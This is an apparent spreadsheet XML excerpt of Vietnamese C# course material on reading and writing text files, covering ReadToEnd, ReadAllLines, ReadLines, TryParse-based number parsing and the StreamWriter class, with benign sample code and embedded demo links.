          <t># Đọc toàn bộ nội dung với ReadToEnd() và các phương thức đọc khác
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Đọc toàn bộ tệp văn bản thành một chuỗi bằng `ReadToEnd()`.
- Đọc toàn bộ tệp thành mảng các dòng bằng `File.ReadAllLines()`.
- Đọc tệp theo kiểu "đến đâu lấy đến đó" bằng `File.ReadLines()` và dừng sớm với `break`.
- Phân biệt hình dạng kết quả và mức dùng bộ nhớ của ba cách đọc.
- Quan sát cùng một tệp `ten.txt` cho ra ba kết quả khác nhau bằng hoạt động mô phỏng.
## Ba cách đọc toàn bộ tệp
Ở bài trước, bạn đã đọc tệp từng dòng bằng `ReadLine()`. Đôi khi ta lại muốn lấy cả tệp một lần. C# có ba cách thường dùng, khác nhau ở **hình dạng kết quả**:
| Cách đọc | Kết quả | Khi nào hợp |
|---|---|---|
| `StreamReader.ReadToEnd()` | Một `string` duy nhất | Cần cả nội dung như một khối văn bản |
| `File.ReadAllLines()` | Mảng `string[]`, mỗi dòng một ô | Tệp nhỏ, cần truy cập dòng theo chỉ số |
| `File.ReadLines()` | Dãy dòng đọc dần (`IEnumerable&lt;string&gt;`) | Tệp lớn, hoặc muốn dừng sớm |
Trong bài, ta dùng tệp `ten.txt` có 3 dòng: `An`, `Bình`, `Chi`.
### ReadToEnd(): cả tệp thành một chuỗi
`ReadToEnd()` của `StreamReader` đọc từ vị trí hiện tại đến hết tệp và trả về **một chuỗi**. Các ký tự xuống dòng nằm ngay trong chuỗi đó.
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        File.WriteAllText("ten.txt", "An\nBình\nChi\n");
        using var r = new StreamReader("ten.txt");
        string all = r.ReadToEnd();
        Console.WriteLine(all.Length);   // 12
    }
}
```
Chuỗi `all` là `"An\nBình\nChi\n"`: 9 chữ cái cộng 3 ký tự xuống dòng, tổng cộng 12 ký tự. Nếu tệp dùng kiểu xuống dòng của Windows (`\r\n`, 2 ký tự mỗi lần), chuỗi sẽ dài hơn.
`ReadToEnd()` rất tiện khi bạn cần tìm kiếm, thay thế hoặc hiển thị cả nội dung. Muốn xử lý riêng từng dòng, bạn phải tự tách chuỗi.
### File.ReadAllLines(): cả tệp thành mảng dòng
`File.ReadAllLines()` mở tệp, đọc hết, tách theo dòng rồi đóng tệp, chỉ trong một lệnh:
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        string[] a = File.ReadAllLines("ten.txt");
        Console.WriteLine(a.Length);   // 3
        Console.WriteLine(a[1]);       // Bình
    }
}
```
Kết quả là `string[3]`. Ký tự xuống dòng bị bỏ đi, mỗi ô chỉ chứa chữ của dòng. Có mảng rồi thì lấy dòng nào cũng được bằng chỉ số.
### File.ReadLines(): đọc dần từng dòng
`File.ReadLines()` **chưa đọc gì** khi bạn gọi nó. Mỗi lần `foreach` hỏi một dòng, nó mới đọc dòng đó:
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        foreach (var s in File.ReadLines("ten.txt"))
        {
            Console.WriteLine(s);
            if (s == "Bình") break;
        }
        // An
        // Bình   (dòng "Chi" không bao giờ được đọc)
    }
}
```
Nhờ đọc dần, bạn có thể dừng sớm bằng `break` mà không tốn công đọc phần còn lại, và không phải nạp cả tệp vào bộ nhớ.
## Hoạt động: Ba hình dạng kết quả
Mô phỏng dưới đây đọc cùng một tệp `ten.txt` bằng ba cách. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **ReadToEnd**. Tệp có 3 dòng, mỗi dòng kết thúc bằng ký tự xuống dòng `↵`. Sau khi `ReadToEnd()` chạy, cả tệp nằm trong một chuỗi `all`, hiện thành một dãy ô: các chữ cái màu xanh và các ký tự `↵` tô màu khác. Bước tiếp theo in `all.Length` ra 12.
- Chuyển sang tab **File.ReadAllLines**. Sau `ReadAllLines`, kết quả là mảng `a` gồm 3 ô `An`, `Bình`, `Chi`, không còn ký tự `↵`. `a.Length` in ra 3. Dòng `a[1]` làm ô `Bình` sáng lên và in ra `Bình`.
- Mở tab **File.ReadLines**. Lúc đầu "băng chuyền" Tệp, `foreach`, `Console` chưa chuyển dòng nào và các dòng của tệp đều mờ. Mỗi lần chạy, `foreach` lấy một dòng: `An` rồi `Bình`. Khi `s == "Bình"` đúng, `break` chạy (ô `foreach` chuyển đỏ) và dòng 3 vẫn mờ vì chưa bao giờ được đọc.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/doc-toan-bo-noi-dung-voi-readtoend-va-cac-phuong-thuc-doc-khac/" title="Đọc toàn bộ nội dung tệp" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: cùng một tệp nhưng ba cách đọc cho ba hình dạng khác nhau: một chuỗi dài, một mảng dòng, hoặc một dãy dòng đọc dần. Tệp nhỏ thì `ReadToEnd()` hay `ReadAllLines()` cho tiện. Tệp lớn thì nên đọc dần để không nạp hết vào bộ nhớ.
## Cẩn thận với tệp lớn
`ReadToEnd()` và `File.ReadAllLines()` đều **nạp toàn bộ tệp vào bộ nhớ**. Với tệp rất lớn (hàng trăm MB hoặc GB), điều này làm chậm chương trình và có thể gây `OutOfMemoryException`. Lúc đó hãy dùng `ReadLine()` hoặc `File.ReadLines()`.
Ngoài ra, `StreamReader` còn có `Read()` đọc từng ký tự (trả về `int`, bằng `-1` khi hết tệp). Cách này ít dùng hơn, chủ yếu cho các bài toán phân tích văn bản đặc biệt.
## Tóm tắt
- `ReadToEnd()` trả về cả tệp dưới dạng một `string`, gồm cả ký tự xuống dòng.
- `File.ReadAllLines()` trả về `string[]`, mỗi dòng một ô và không còn ký tự xuống dòng.
- `File.ReadLines()` đọc dần theo từng lần `foreach` hỏi, nên có thể dừng sớm bằng `break`.
- `ReadToEnd()` và `ReadAllLines()` nạp cả tệp vào bộ nhớ, chỉ nên dùng với tệp nhỏ.
- Tệp lớn thì dùng `ReadLine()` hoặc `File.ReadLines()`.</t>
        </is>
      </c>
    </row>
    <row r="36" ht="409.6" customHeight="1" s="18">
      <c r="A36" s="10" t="n">
        <v>36</v>
      </c>
      <c r="B36" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C36" s="10" t="inlineStr">
        <is>
          <t>Đọc File Văn bản</t>
        </is>
      </c>
      <c r="D36" s="10" t="inlineStr">
        <is>
          <t>Đọc file và xử lý dữ liệu đơn giản</t>
        </is>
      </c>
      <c r="E36" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F36" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G36" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H36" s="10" t="inlineStr">
        <is>
          <t>Kết hợp đọc từng dòng, chuyển đổi an toàn bằng TryParse và tính toán.</t>
        </is>
      </c>
      <c r="I36" s="10" t="inlineStr">
        <is>
          <t>1 cột</t>
        </is>
      </c>
      <c r="J36" s="10" t="inlineStr">
        <is>
          <t>Trình xem tệp numbers.txt; mỗi dòng đi qua 'bộ chuyển đổi' TryParse: ✓ cộng vào tổng, ✗ thả vào danh sách dòng lỗi. Ô Tổng, Max, Số dòng lỗi cập nhật mỗi bước.</t>
        </is>
      </c>
      <c r="K36" s="10" t="inlineStr">
        <is>
          <t>H12, H21</t>
        </is>
      </c>
      <c r="L36" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M36" s="10" t="inlineStr">
        <is>
          <t>Dòng 1 "12" → tổng 12, max 12.
Dòng 2 "7" → tổng 19.
Dòng 3 "abc" → TryParse false, ghi lỗi dòng 3.
Dòng 4 "20" → tổng 39, max 20.
Dòng 5 "" → lỗi dòng 5.
Dòng 6 "5" → tổng 44. Xong: tổng 44, max 20, 2 dòng lỗi (3 và 5).</t>
        </is>
      </c>
      <c r="N36" s="10" t="inlineStr">
        <is>
          <t>numbers.txt: 12, 7, abc, 20, (trống), 5</t>
        </is>
      </c>
      <c r="O36" s="10" t="inlineStr">
        <is>
          <t>Dữ liệu trong tệp luôn là chuỗi; phải chuyển đổi an toàn và ghi lại dòng lỗi.</t>
        </is>
      </c>
      <c r="P36" s="10" t="n"/>
      <c r="Q36" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/doc-file-va-xu-ly-du-lieu-don-gian/index.html</t>
        </is>
      </c>
      <c r="R36" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/doc-file-va-xu-ly-du-lieu-don-gian/</t>
        </is>
      </c>
      <c r="S36" s="10" t="n"/>
      <c r="T36" s="12" t="n"/>
      <c r="U36" s="12" t="n"/>
      <c r="V36" s="21" t="inlineStr">
        <is>
          <t>Đọc file và xử lý dữ liệu đơn giản
Sau khi đã nắm vững các phương thức cốt lõi của lớp StreamReader như ReadLine() và ReadToEnd(), chúng ta cần đi xa hơn việc chỉ đơn thuần truy xuất dữ liệu. Thực tế trong các ứng dụng C#, dữ liệu từ file thường cần được xử lý, lọc hoặc biến đổi trước khi được hiển thị hoặc lưu trữ vào bộ nhớ. Trang bài học này sẽ tập trung vào kỹ thuật kết hợp việc đọc file với các logic xử lý dữ liệu đơn giản.
Quy trình xử lý dữ liệu từ file
Một quy trình xử lý file tiêu chuẩn thường bao gồm ba giai đoạn: Mở luồng, Đọc và xử lý từng đơn vị dữ liệu, và Đóng luồng. Thay vì chỉ in dữ liệu ra màn hình, chúng ta thường áp dụng các phép toán, kiểm tra điều kiện hoặc phân tách chuỗi (string parsing) ngay trong lúc đọc.
Ví dụ, khi đọc một file danh sách sản phẩm, bạn có thể muốn:
Bỏ qua các dòng trống hoặc dòng chứa chú thích.
Kiểm tra dữ liệu có hợp lệ hay không (ví dụ: giá trị số phải nằm trong khoảng cho phép).
Chuyển đổi dữ liệu từ chuỗi (string) sang các kiểu dữ liệu khác như int, double hoặc DateTime.
Ví dụ xử lý dữ liệu số từ file
Giả sử bạn có một file data.txt chứa danh sách các con số, mỗi con số trên một dòng. Nhiệm vụ của bạn là đọc file này, tính tổng các số đó và bỏ qua những dòng không phải là số hợp lệ.
using System;
using System.IO;
public class DataProcessor
{
    public static void ProcessNumbers(string filePath)
    {
        double sum = 0;
        try
        {
            using (StreamReader sr = new StreamReader(filePath))
            {
                string line;
                while ((line = sr.ReadLine()) != null)
                {
                    // Xử lý: Kiểm tra xem dòng có phải là số hợp lệ không
                    if (double.TryParse(line, out double number))
                    {
                        sum += number;
                    }
                    else
                    {
                        Console.WriteLine($"Bỏ qua dữ liệu không hợp lệ: {line}");
                    }
                }
            }
            Console.WriteLine($"Tổng các giá trị là: {sum}");
        }
        catch (FileNotFoundException)
        {
            Console.WriteLine("File không tồn tại.");
        }
    }
}
Trong đoạn mã trên, chúng ta không chỉ đọc mà còn sử dụng double.TryParse để lọc dữ liệu. Đây là kỹ thuật quan trọng giúp ứng dụng không bị treo hoặc báo lỗi khi gặp dữ liệu xấu trong file.
Xử lý dữ liệu có cấu trúc (Phân tách chuỗi)
Đa số dữ liệu thực tế thường nằm ở định dạng phân cách bởi dấu phẩy (CSV) hoặc dấu tab. Để xử lý dạng này, bạn cần kết hợp ReadLine() với phương thức string.Split().
Lưu ý: Luôn đảm bảo rằng số lượng phần tử sau khi tách (Split) khớp với cấu trúc bạn mong đợi để tránh lỗi IndexOutOfRangeException.
// Giả sử file có định dạng: Tên, Tuổi
string line = "An, 25";
string[] parts = line.Split(',');
if (parts.Length == 2)
{
    string name = parts[0].Trim();
    int age = int.Parse(parts[1].Trim());
    Console.WriteLine($"Người dùng: {name}, {age} tuổi.");
}
Những lỗi cần tránh khi xử lý dữ liệu
Khi làm việc với các tệp tin bên ngoài, dữ liệu luôn tiềm ẩn rủi ro. Dưới đây là những lỗi phổ biến bạn cần lưu ý:
Lỗi định dạng (Format Exception): Luôn sử dụng TryParse thay vì Parse khi chuyển đổi chuỗi sang số. Dữ liệu trong file có thể bị thay đổi bởi người dùng mà bạn không kiểm soát được.
Lỗi luồng (Stream State): Sau khi đã đọc hết file, đừng cố gắng đọc thêm. Phương thức ReadLine() trả về null là dấu hiệu duy nhất bạn cần để dừng vòng lặp while.
Quản lý tài nguyên: Luôn sử dụng từ khóa using để đảm bảo StreamReader được đóng lại ngay cả khi có lỗi xảy ra. Việc quên đóng file có thể khiến file bị khóa, gây lỗi cho các tác vụ khác trong hệ thống.
Khoảng trắng thừa: Sử dụng phương thức .Trim() sau khi đọc một dòng để loại bỏ các khoảng trắng vô hình ở đầu và cuối dòng, giúp việc so sánh hoặc ép kiểu dữ liệu chính xác hơn.
Bằng cách áp dụng những nguyên tắc này, ứng dụng của bạn sẽ trở nên linh hoạt hơn, có khả năng xử lý các nguồn dữ liệu từ bên ngoài một cách tin cậy và chuyên nghiệp. Bạn đã sẵn sàng để thử thách với các tệp tin phức tạp hơn chưa?</t>
        </is>
      </c>
      <c r="W36" s="22" t="inlineStr">
        <is>
          <t># Đọc file và xử lý dữ liệu đơn giản
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích vì sao mọi dòng đọc từ tệp văn bản đều là chuỗi và cần chuyển đổi trước khi tính toán.
- Dùng `int.TryParse` để chuyển chuỗi sang số an toàn, không bị lỗi khi gặp dữ liệu xấu.
- Viết chương trình đọc tệp, cộng tổng, tìm giá trị lớn nhất và ghi lại số dòng lỗi.
- Tách một dòng có cấu trúc bằng `Split()` và kiểm tra số phần tử trước khi dùng.
- Quan sát từng dòng của `numbers.txt` được xử lý bằng hoạt động mô phỏng.
## Dữ liệu trong tệp luôn là chuỗi
Khi đọc tệp, bạn nhận về **chuỗi**, kể cả khi trong tệp là con số. Thực tế, dữ liệu từ tệp thường cần được kiểm tra, lọc hoặc biến đổi trước khi dùng. Ví dụ, khi đọc một tệp danh sách bạn có thể muốn:
- Bỏ qua dòng trống hoặc dòng chú thích.
- Kiểm tra dữ liệu có hợp lệ không.
- Chuyển chuỗi sang `int`, `double` hoặc `DateTime`.
Tệp do người dùng sửa được, nên bạn không thể chắc mọi dòng đều đúng. Vì vậy ta cần chuyển đổi **an toàn**.
### Parse và TryParse
`int.Parse(s)` ném `FormatException` nếu `s` không phải số. `int.TryParse(s, out int v)` thì không ném lỗi: nó trả về `true` kèm giá trị trong `v` nếu chuyển được, và `false` nếu không.
| Phương thức | Chuỗi `"abc"` | Chuỗi rỗng `""` |
|---|---|---|
| `int.Parse` | Ném `FormatException` | Ném `FormatException` |
| `int.TryParse` | Trả về `false` | Trả về `false` |
Khi đọc dữ liệu từ tệp, hãy ưu tiên `TryParse`.
## Ví dụ: cộng tổng các số trong tệp
Giả sử `numbers.txt` có 6 dòng, trong đó có một dòng chữ và một dòng trống:
```
12
7
abc
20
5
```
Nhiệm vụ: cộng các số hợp lệ, tìm số lớn nhất, và ghi lại số thứ tự các dòng lỗi.
```csharp
using System;
using System.Collections.Generic;
using System.IO;
public class Program
{
    public static void Main()
    {
        var lines = File.ReadAllLines("numbers.txt");
        int sum = 0, max = 0;
        var bad = new List&lt;int&gt;();
        int no = 0;
        foreach (var s in lines)
        {
            no++;
            if (int.TryParse(s, out int v))
            {
                sum += v;
                if (v &gt; max) max = v;
            }
            else bad.Add(no);
        }
        Console.WriteLine($"Tổng = {sum}, Max = {max}");   // Tổng = 44, Max = 20
        Console.WriteLine("Dòng lỗi: " + string.Join(", ", bad));   // Dòng lỗi: 3, 5
    }
}
```
Mỗi dòng đi qua cùng một cách xử lý:
1. Tăng `no` để biết đang ở dòng thứ mấy.
2. Gọi `int.TryParse`. Nếu `true`, cộng `v` vào `sum` và cập nhật `max` khi cần.
3. Nếu `false`, thêm số dòng vào danh sách `bad` mà không làm hỏng tổng.
&gt; **Lưu ý:** `max` bắt đầu từ 0, nên ví dụ này giả định các số không âm. Với dữ liệu có số âm, bạn cần khởi tạo `max` theo cách khác.
## Hoạt động: Xử lý từng dòng của numbers.txt
Mô phỏng dưới đây chạy đúng chương trình trên. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Đọc numbers.txt**. Bước đầu, tệp được đọc thành mảng 6 chuỗi, `sum = 0`, `max = 0` và danh sách `bad` còn rỗng. Hình minh họa có ba phần: tệp `numbers.txt`, hai ngăn "Hợp lệ (cộng vào tổng)" và "Dòng lỗi (ghi lại)", cùng ba thẻ `Tổng`, `Max`, `Số dòng lỗi`.
- Bấm qua dòng 1 và 2. `"12"` rồi `"7"` chuyển được, dòng trong tệp chuyển xanh và rơi vào ngăn hợp lệ. Tổng thành 12 rồi 19, `max` cập nhật thành 12 rồi giữ nguyên là 12.
- Bấm dòng 3. `"abc"` không chuyển thành số được, `TryParse` trả về `false`. Dòng bị đánh dấu lỗi, ngăn "Dòng lỗi" ghi "dòng 3", thẻ `Số dòng lỗi` chuyển đỏ, tổng giữ nguyên 19.
- Bấm dòng 4. `"20"` hợp lệ: tổng thành 39, `max` cập nhật thành 20.
- Bấm dòng 5. Đây là dòng trống, chuỗi rỗng cũng không chuyển được, nên bị ghi lỗi ở dòng 5 và tổng vẫn 39.
- Bấm dòng 6. `"5"` hợp lệ: tổng thành 44, `max` vẫn là 20.
- Bước cuối cho kết quả: tổng = 44, max = 20 và có 2 dòng lỗi (3 và 5).
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/doc-file-van-ban/doc-file-va-xu-ly-du-lieu-don-gian/" title="Đọc file và xử lý dữ liệu" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: dữ liệu trong tệp luôn là chuỗi, và có thể sai. Chuyển đổi bằng `TryParse` cho phép chương trình bỏ qua dòng xấu, ghi lại vị trí lỗi và vẫn tính đúng phần còn lại.
## Dữ liệu có cấu trúc: dùng Split()
Nhiều tệp lưu mỗi dòng gồm vài trường ngăn cách bằng dấu phẩy hoặc dấu tab. Khi đó ta kết hợp `ReadLine()` (hoặc `foreach` trên các dòng) với `Split()`:
```csharp
using System;
public class Program
{
    public static void Main()
    {
        string line = "An, 25";          // định dạng: Tên, Tuổi
        string[] parts = line.Split(',');
        if (parts.Length == 2 &amp;&amp; int.TryParse(parts[1].Trim(), out int age))
        {
            string name = parts[0].Trim();
            Console.WriteLine($"Người dùng: {name}, {age} tuổi.");   // Người dùng: An, 25 tuổi.
        }
    }
}
```
Hãy luôn kiểm tra `parts.Length` trước khi truy cập `parts[1]` để tránh `IndexOutOfRangeException`. Dùng `Trim()` để bỏ khoảng trắng thừa ở đầu và cuối trước khi so sánh hoặc chuyển kiểu.
## Những lỗi cần tránh
- **Dùng `Parse` thay cho `TryParse`:** một dòng sai làm cả chương trình dừng với `FormatException`.
- **Quên đóng tệp:** dùng `using` với `StreamReader` (còn `File.ReadAllLines` tự đóng tệp).
- **Không kiểm tra số phần tử sau `Split()`:** dòng thiếu trường sẽ gây lỗi chỉ số.
- **Bỏ qua khoảng trắng thừa:** dùng `Trim()` để so sánh và chuyển kiểu chính xác hơn.
## Tóm tắt
- Mọi dòng đọc từ tệp đều là chuỗi, cần chuyển sang kiểu dữ liệu phù hợp trước khi tính toán.
- `int.TryParse` trả về `false` thay vì ném lỗi, nên hợp với dữ liệu không đáng tin cậy.
- Ghi lại số thứ tự dòng lỗi giúp biết dữ liệu nào cần sửa, trong khi các dòng đúng vẫn được xử lý.
- Với dòng có nhiều trường, dùng `Split()` rồi kiểm tra `Length` và `Trim()` từng phần.
- Luôn đóng tệp đúng cách bằng `using`.</t>
        </is>
      </c>
    </row>
    <row r="37" ht="409.6" customHeight="1" s="18">
      <c r="A37" s="10" t="n">
        <v>37</v>
      </c>
      <c r="B37" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C37" s="10" t="inlineStr">
        <is>
          <t>Ghi File Văn bản</t>
        </is>
      </c>
      <c r="D37" s="10" t="inlineStr">
        <is>
          <t>Giới thiệu lớp StreamWriter</t>
        </is>
      </c>
      <c r="E37" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F37" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G37" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H37" s="10" t="inlineStr">
        <is>
          <t>Thấy StreamWriter ghi vào bộ đệm trước, và chỉ đẩy xuống tệp khi Flush/Close/Dispose.</t>
        </is>
      </c>
      <c r="I37" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Quên đóng | Có using</t>
        </is>
      </c>
      <c r="J37" s="10" t="inlineStr">
        <is>
          <t>Ba khối Chương trình → Bộ đệm (hộp có vạch đầy dần) → Tệp trên đĩa (hiện kích thước byte). Khi Close/Dispose, nội dung bộ đệm 'đổ' xuống tệp.</t>
        </is>
      </c>
      <c r="K37" s="10" t="inlineStr">
        <is>
          <t>H13, H12</t>
        </is>
      </c>
      <c r="L37" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M37" s="10" t="inlineStr">
        <is>
          <t>Hai cột: new StreamWriter("log.txt").
WriteLine("Dòng 1"), WriteLine("Dòng 2") → chữ nằm trong bộ đệm, tệp vẫn 0 byte.
Trái: chương trình kết thúc mà không Close → bộ đệm bị bỏ, tệp vẫn 0 byte.
Phải: rời khối using → Dispose → Flush → tệp có 2 dòng.
Xong: so sánh nội dung tệp hai bên.</t>
        </is>
      </c>
      <c r="N37" s="10" t="inlineStr">
        <is>
          <t>2 dòng log</t>
        </is>
      </c>
      <c r="O37" s="10" t="inlineStr">
        <is>
          <t>Luôn đóng StreamWriter, tốt nhất bằng using, để dữ liệu thật sự được ghi xuống tệp.</t>
        </is>
      </c>
      <c r="P37" s="10" t="inlineStr">
        <is>
          <t>Bộ đệm có kích thước giới hạn; ghi nhiều dữ liệu thì một phần tự được đẩy xuống. Mô phỏng dùng dữ liệu nhỏ để thấy rõ hiện tượng mất dữ liệu.</t>
        </is>
      </c>
      <c r="Q37" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/ghi-file-van-ban/gioi-thieu-lop-streamwriter/index.html</t>
        </is>
      </c>
      <c r="R37" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/ghi-file-van-ban/gioi-thieu-lop-streamwriter/</t>
        </is>
      </c>
      <c r="S37" s="10" t="n"/>
      <c r="T37" s="12" t="n"/>
      <c r="U37" s="12" t="n"/>
      <c r="V37" s="21" t="inlineStr">
        <is>
          <t>Giới thiệu lớp StreamWriter
Trong quá trình phát triển ứng dụng, việc lưu trữ và đọc dữ liệu từ file là một kỹ năng thiết yếu. Khi làm việc với file văn bản, chúng ta thường cần ghi các chuỗi ký tự (text) chứ không phải các byte thô. Lớp StreamWriter trong C# được thiết kế để đơn giản hóa quá trình ghi dữ liệu dạng ký tự vào một luồng (stream), đặc biệt là file.
StreamWriter là một adapter mạnh mẽ, cho phép bạn dễ dàng ghi các chuỗi, số nguyên, hoặc các kiểu dữ liệu khác dưới dạng văn bản vào một Stream cơ bản. Nó tự động xử lý việc chuyển đổi từ ký tự sang byte dựa trên bộ mã hóa (encoding) được chỉ định, giúp chúng ta không cần phải lo lắng về các thao tác byte-level phức tạp.
Các Constructor Phổ biến của StreamWriter
StreamWriter cung cấp nhiều constructor để phù hợp với các kịch bản sử dụng khác nhau. Dưới đây là một số constructor thường gặp:
Ghi vào một file theo đường dẫn:
StreamWriter writer = new StreamWriter("duong_dan_file.txt");
Constructor này sẽ tạo một file mới tại duong_dan_file.txt. Nếu file đã tồn tại, nó sẽ bị ghi đè. Mặc định, nó sử dụng bộ mã hóa UTF-8 (đối với .NET Core/.NET 5 trở lên) hoặc UTF-8 không có BOM (Byte Order Mark) trên các phiên bản .NET Framework cũ hơn.
Ghi vào file với tùy chọn ghi đè hoặc thêm vào cuối:
StreamWriter writer = new StreamWriter("duong_dan_file.txt", true); // Ghi thêm vào cuối
StreamWriter writer = new StreamWriter("duong_dan_file.txt", false); // Ghi đè (mặc định)
Tham số bool append cho phép bạn kiểm soát hành vi ghi: true để thêm dữ liệu vào cuối file (append mode), false để ghi đè toàn bộ nội dung file hiện có.
Ghi vào file với tùy chọn mã hóa:
StreamWriter writer = new StreamWriter("duong_dan_file.txt", true, System.Text.Encoding.UTF8);
Constructor này cho phép bạn chỉ định rõ ràng bộ mã hóa sẽ được sử dụng khi chuyển đổi ký tự thành byte. Điều này cực kỳ quan trọng để đảm bảo tính toàn vẹn của dữ liệu văn bản, đặc biệt khi làm việc với các ngôn ngữ có ký tự đặc biệt.
Ghi vào một Stream đã tồn tại:
FileStream fs = new FileStream("duong_dan_file.txt", FileMode.Create);
StreamWriter writer = new StreamWriter(fs);
Đây là constructor quan trọng, minh họa mối quan hệ giữa StreamWriter và Stream cơ bản. Nó cho phép bạn "bọc" một Stream (ví dụ: FileStream, NetworkStream, MemoryStream) để ghi dữ liệu dạng ký tự một cách dễ dàng.
Để đảm bảo tài nguyên được giải phóng đúng cách, hãy luôn sử dụng StreamWriter trong khối using hoặc gọi phương thức Close() một cách tường minh.
// Ví dụ sử dụng constructor cơ bản
using (StreamWriter writer = new StreamWriter("myfile.txt"))
{
    writer.Write("Đây là dòng đầu tiên.");
    writer.WriteLine("Đây là dòng thứ hai.");
} // writer.Dispose() (và Close()) được gọi tự động ở đây
Cách StreamWriter hoạt động với FileStream
StreamWriter không trực tiếp thao tác với file trên hệ điều hành. Thay vào đó, nó hoạt động trên một Stream cơ bản. Trong trường hợp ghi file, StreamWriter thường được đặt "trên" một FileStream.
Hãy hình dung FileStream như một đường ống dẫn dữ liệu trực tiếp đến và đi từ file trên ổ đĩa. FileStream làm việc với dữ liệu ở cấp độ byte. Khi bạn muốn ghi các ký tự hoặc chuỗi, việc chuyển đổi chúng thành byte theo một quy tắc mã hóa nhất định có thể phức tạp.
Đây là lúc StreamWriter phát huy tác dụng. StreamWriter đóng vai trò như một "bộ chuyển đổi" hoặc "bộ lọc" đặt giữa ứng dụng của bạn và FileStream. Khi bạn gọi các phương thức như Write() hoặc WriteLine() trên StreamWriter, nó sẽ thực hiện các bước sau:
Lấy chuỗi ký tự bạn muốn ghi.
Chuyển đổi chuỗi ký tự đó thành một mảng byte dựa trên bộ mã hóa (encoding) đã được cấu hình (ví dụ: UTF-8).
Truyền mảng byte này đến FileStream cơ bản.
FileStream sau đó sẽ ghi các byte này vào file trên hệ thống.
Ví dụ minh họa mối quan hệ này:
string filePath = "mydata.txt";
// Bước 1: Tạo một FileStream để xử lý I/O byte-level
// FileMode.CreateNew sẽ tạo file mới, nếu đã tồn tại sẽ báo lỗi.
// FileMode.Create sẽ tạo mới hoặc ghi đè nếu tồn tại.
using (FileStream fs = new FileStream(filePath, FileMode.Create, FileAccess.Write))
{
    // Bước 2: Bọc FileStream bằng StreamWriter để ghi dữ liệu ký tự
    using (StreamWriter writer = new StreamWriter(fs))
    {
        writer.WriteLine("Hello từ FileStream và StreamWriter!");
        writer.WriteLine("Đây là dòng thứ hai.");
    } // StreamWriter.Dispose() được gọi, đóng cả FileStream
}
Trong ví dụ trên, StreamWriter giúp chúng ta không cần phải tự chuyển đổi chuỗi "Hello từ..." thành các byte rồi mới ghi vào fs. Nó xử lý tất cả những chi tiết đó một cách tự động.
Các Tùy chọn Mã hóa (Encoding) khi ghi file
Mã hóa là tập hợp các quy tắc dùng để biểu diễn các ký tự văn bản dưới dạng byte. Việc chọn đúng bộ mã hóa là rất quan trọng để đảm bảo văn bản được ghi và đọc chính xác, đặc biệt khi làm việc với các ngôn ngữ có ký tự đặc biệt (như tiếng Việt, tiếng Nhật, tiếng Ả Rập, v.v.).
Nếu bạn ghi một file bằng bộ mã hóa này và cố gắng đọc nó bằng một bộ mã hóa khác không tương thích, bạn có thể gặp phải tình trạng "lỗi font" hoặc các ký tự bị biến dạng.
Các bộ mã hóa phổ biến trong .NET được tìm thấy trong namespace System.Text.Encoding:
Encoding.UTF8: Đây là bộ mã hóa khuyến nghị cho hầu hết các ứng dụng hiện đại. Nó hỗ trợ một phạm vi rất rộng các ký tự từ hầu hết các ngôn ngữ trên thế giới và tương thích tốt với web.
Encoding.Unicode: Thường đề cập đến UTF-16 (little-endian). Sử dụng 2 byte hoặc nhiều hơn cho mỗi ký tự.
Encoding.ASCII: Chỉ hỗ trợ các ký tự tiếng Anh cơ bản (0-127). Không phù hợp cho văn bản đa ngôn ngữ.
Encoding.Default: Đại diện cho bộ mã hóa mặc định của hệ thống hiện tại. Việc sử dụng Default có thể gây ra vấn đề tương thích nếu file được đọc trên một hệ thống có bộ mã hóa mặc định khác.
Ví dụ sử dụng các bộ mã hóa khác nhau:
using System;
using System.IO;
using System.Text;
class EncodingExample
{
    public static void Main()
    {
        string text = "Chào mừng bạn đến với C# Ứng dụng!";
        string filePathUtf8 = "vietnamese_utf8.txt";
        string filePathAscii = "vietnamese_ascii.txt";
        // Ghi với UTF-8 (đây là cách tốt nhất cho tiếng Việt)
        using (StreamWriter writer = new StreamWriter(filePathUtf8, false, Encoding.UTF8))
        {
            writer.WriteLine(text);
            Console.WriteLine($"Đã ghi '{text}' vào {filePathUtf8} với UTF-8.");
        }
        // Ghi với ASCII (sẽ mất thông tin ký tự tiếng Việt)
        try
        {
